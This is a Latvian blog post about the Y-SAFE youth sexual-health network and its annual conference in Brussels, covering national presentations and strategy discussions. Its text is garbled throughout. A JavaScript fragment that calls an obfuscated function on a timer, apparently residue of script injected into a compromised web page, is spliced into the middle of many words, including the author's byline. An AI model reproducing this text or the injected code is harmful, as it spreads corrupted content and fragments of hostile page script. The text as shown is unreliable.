Pirms stāstu par savu pieredzi Y-SAFE ikgadējā konferencē, kas jūlija sākumā norisinājās Brisēlē, ir svarīgi pastāstīt par dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, kas ir Y-SAFE, kā tas radies un kāds ir tā mērķis?

Y-SAFE (“Youth Sexual Awareness For Europe”)

Y-SAFE ar jauniešu iniciatīvu tika dibināts 2006. Gadā. Šobrī dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to pārstāv 86 biedri no 30 dažādām nevalstiskajām organizācijām visā Eiropā. Par biedru var kļūt jebkurš jaunietis (vecumā līdz 25 gadiem), kas darbojas kā brīvprātīgais kādā no IPPF sadarbības organizācijām. Šobrīd esam 2 brīvprātīgās jaunietes, kas pārstāv Latviju. 

Y-SAFE mērķis ir panākt lielāku jauniešu iesaisti seksuālās un reproduktīvās veselības un tiesību jautājumos, kā arī pārliecināties, ka jaunieši ir daļa no organizācijas, kurā tie darbojas. Galvenajās tēmās tiek ietverta gan visaptveroša seksuālā izglītība, seksuāla un dzimumos balstīta vardarbība, intersekcionalitāte, kā arī jau iepriekš pieminētā uz jauniešiem centrētā pieeja. Papildus mērķis ir stiprināt jauniešu tīklu visā Eiropas un Centrālās Āzijas reģionā, lai nodrošinātu sadarbību, pieredzes apmaiņu un interešu aizstāvību.

Tāpat svarīgi uzsvērt, ka pēdējo gadu reformu rezultātā IPPF (Starptautiskā ģimenes plānošanas federācija – virsorganizācija, kas pārrauga visu meitas organizāciju, tādu kā PZ, darbību) ir ieviesusi jaunu likumu, kas paredz, ka organizāciju galvenajā lēmejinstitūcijā (Latvijā tā ir biedrības padome) vismaz 20% no  biedru sastāva jābūt jauniešiem, tādejādi palīdzot uzklausīt  un integrēt dažāda veida skatījumus organizācijas darbībā.

Par Y-SAFE vairāk informācijas vari atrast mājaslapā

Bet, nu, nedaudz vairāk pastāstīšu par konferences darba kārtību un iegūtajām atziņām. 

Pirmā diena, kā ierasts sākās ar konferences atklāšanu. Tālāk sekoja prezentācijas. Katras valsts pārstāvim 10 minūšu laikā tika dota iespēja pastāstīt par savas organizācijas jauniešu kustību, tās mērķiem un grūtībām, kā arī līdz šim paveikdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to. Bija tik tiešām ieintereģējoši redzēt, kādas idejas tiek īstenotas citās valstīs. 

Visspilgtāk man atmiņā palikušas Bulgārijas, Šveices un Nīderlandes iniciatīvas. Lai sasniegtu plašāku audidom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toriju Bulgārijā ir ticis īstenots video projekts, kurā īsi un kodolīgi tiek pastāstīts par dažādām tēmām, kas saistītas ar seksuālo un reproduktīvo veselību. Savukārt Šveices jaunieši šobrīd izstrādā komiksu grāmatu, kas paredzēta jauniešu izglīdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tošanai. Nīderlande is spērusi soli pretī jauniešu līderības veicināšanai un īpaši paredzētā programmā, kas ilgst gadu, piedāvā iespēju apgūt dažādas līderības prasmes, kas lieti noder vadot brīvprātīgo jauniešu kustību.

Otrā diena sākās ar diskusijām, saistībā ar problēmām ar kurām sasdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topas katra no organizācijām, runājot par dzimumu. Tuprinājumā tika prioritizētas svarīgākās tēmas, kuras nepieciešams iekļaut Y-SAFE stratēģijā, kas līdz ar IPPF stratēģiju arī ir izstrādes stadijā (Šeit Tu vari atrast IPPF Stratēģiju 2022-2028). Uzklausot dalībnieku domas un skatījumu bija iespējams paraudzīties uz mūsu pašu problēmām plašāk un  ieraudzīt dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, par ko šobrīd netiek runāts. 

Audom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tors: Ieva Pūce